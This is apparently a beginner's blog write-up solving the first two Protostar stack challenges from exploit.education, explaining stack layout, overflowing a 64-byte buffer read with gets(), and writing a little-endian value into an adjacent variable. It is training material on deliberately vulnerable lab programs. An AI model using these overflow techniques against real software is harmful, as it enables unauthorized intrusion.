Reader TTS

I started doing binary exploitation challenges from exploit.education website. To be honest I was surprised by the way they approached every question. With this challenge, you’ll get good at

solving basic Stack Buffer Overflow questions. We will be doing a challenge called Protostar. This challenge has many types of exploits like the Stack, Heap, etc. But let us concentrate on

the Stack type for now. Before starting, it is only fair to tell you that I am a newbie too. I have approached this is by referring to a book called Nightmare. I will now take you through

how I solved the challenge. Let’s GO! STACK ZERO This is the first challenge. The Source Code is given below. Let us try to analyze the code. We have variables “modified” and “buffer” which

is an array of 64 characters. Then we have the value of “modified” set to 0. We take in the value for the buffer using the gets() command. Things get interesting from here. The hint for the

question is given in the challenge section of the website as follows: This means that there is no memory protection. We can overwrite the other values too! If you further analyze the code we

notice _IF(MODIFIED !=0), _so if we try to bypass this, we can complete the challenge. For this, you need to know how Stack works. When we declare variables, there is a portion of stack

memory allocated for it. A variable declared will be on the top at first. The stack moves from a higher address to a lower address. Then as we keep adding variables, we push the previous

variable to the lower address and the newer elements are on the top. I hope this makes sense now. If we give input for the “buffer” and give any extra character, it is going to overwrite the

next variable i.e. the 65th character will change the property of the “modified” variable. Now we will have a look at the exploit. We use python to exploit, as typing 65 characters manually

is boring. Here we used python to give 64 A’s to fill up the buffer, then we give random characters to modify the “modified” variable. This prints a message “you have changed the modified

variable”. So we successfully finished our first challenge! STACK ONE I have clearly explained how Stack works. It might come in handy when we solve the next challenges! This challenge is to

learn about the Little-endian format and how to send the desired value into the memory. The Source Code is given to us as shown: Here, the initial concept is the same but the “modified”

value has to be _“0x61626364”_. Let us look at the hints given on the website: Two hints are given, first, we need to know about the hexadecimal. Every character on your keyboard has a

hexadecimal value which is easy for the machine to process. The next hint given is “Little-endian format”. This is fairly easy to understand if you get the concept. The Little-endian format

is reversing 2 characters at a time. For example 0x61626364 will become \x64\x63\x62\x61 in hexadecimal format. When we analyze the code, it takes the argument in the command line itself. So

we cannot proceed like our previous challenge. Let us try a different approach. With a $ symbol you’ll be able to give your input in the command line as an argument. And voila! We finished

our second challenge too!! The next challenge will be posted soon! Until then, goodbye!